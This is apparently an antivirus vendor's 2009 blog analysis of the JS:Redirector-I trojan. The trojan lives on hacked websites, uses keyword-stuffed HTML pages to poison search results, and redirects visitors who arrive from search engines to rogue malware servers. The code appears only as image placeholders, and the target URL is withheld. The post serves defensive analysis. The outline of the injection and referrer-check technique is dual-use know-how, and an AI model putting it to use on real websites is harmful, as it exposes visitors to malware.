Protecting over 200 million PCs, Macs, & Mobiles – more than any other antivirus


May 21st, 2009

Rogue malware ranking

Nowadays the internet is full of hacked websites that redirect browsing users to various malware distribution networks. Website hacking consists basically of adding an iframe, script tag or some more sophisticated javascript to the clean code. These methods are dependent only on the reputation of infected domains. Last week (2009-05-13) we released the detection signatures of one interesting redirector – Its name is JS:Redirector-I [Trj]. The source is a type of Rogue malware which is comonly known to use social engineering to spread. Now we can talk about ’search engine related’ social engineering. The redirector itself doesn’t look particularly sophisticated – simple code is hidden as shown in next image:

2_js
All the script functionality is hidden, but nothing new can be found after “unhiding” the script. There are simple decisions about the referrer and creation of the new url to which the browser will be redirected. The unpacked redirection script is shown in the next image (for security reasons the target url has been removed):

2_js_unp

The only way to be redirected by this script is to arrive via any of the tested search engines. This means that the user must enter the correct conditions for the search engine to offer at least one of the infected URLs. How it is done? Let’s see the full hack – it consists of more than 200 html files and one javascript file. The directory structure is shown in the next image (only the beginning and end of the structure is shown):

js_redir-i-directory

Two randomly named directories are created during the hack and all the files are placed into the second subdirectory. The filenames of the html files say what’s inside – let’s look inside zimbabwe.htm:

js_redir_i_html

The image above shows that the html files contain many keywords and phrases to fool search engines and their indexers. Let’s google with the phrase shown in the red box:

js_redir_i_google

The hacked website is presented third, which means we were searching by criteria that the hackers were expecting. Just one click and the user’s computer will be redirected to install new Rogue malware. Finally here is the detection score of the javascript redirector (http://www.virustotal.com/en/analisis/57c5698d1677ba219baf95817f5b87fd):

js_redir-i-virustotal

behavior of JS:Redirector-I [Trj]:

  • doesn’t affect the hacked website, just hijacks its space to ambush unsuspecting visitors
  • fools search engines to serve the hacked urls
  • redirects to Rogue malware servers
  • accepts only the most used search engines as referers
Categories: analyses Tags:
  • lukor

    I like the detection score ;-)